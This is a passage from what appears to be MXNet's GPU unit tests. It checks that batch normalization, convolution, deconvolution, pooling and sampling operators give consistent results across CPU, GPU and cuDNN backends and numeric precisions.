sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
tol = 1e-1
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=tol)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
# kernel overlap. The non-cudnn conv op doesn't do this so is used as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
# tol can be pretty high- we're looking for a large diff due to garbaged workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@with_seed()
def test_convolution_multiple_streams():
for num_streams in [1, 2]:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print("Starting engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print("Finished engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# More max-pooling strides and pads to test cudnn pooling implementation code paths
@with_seed()
def test_pooling_nhwc_with_convention():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
    # While the float32 and float64 outputs are reliably consistent, float16 departs occasionally.
    # We compare nhwc and nchw results only within a given precision.
for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]:
for kernel in [(2,2), (3,3), (4,4)]:
for stride in [(1,1), (1,2), (2,1), (2,2)]:
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape,
'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='valid', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride,
pooling_convention='full', name='pool')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(kernel=(300,300), pool_type='max',
global_pool=True, name='pool')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
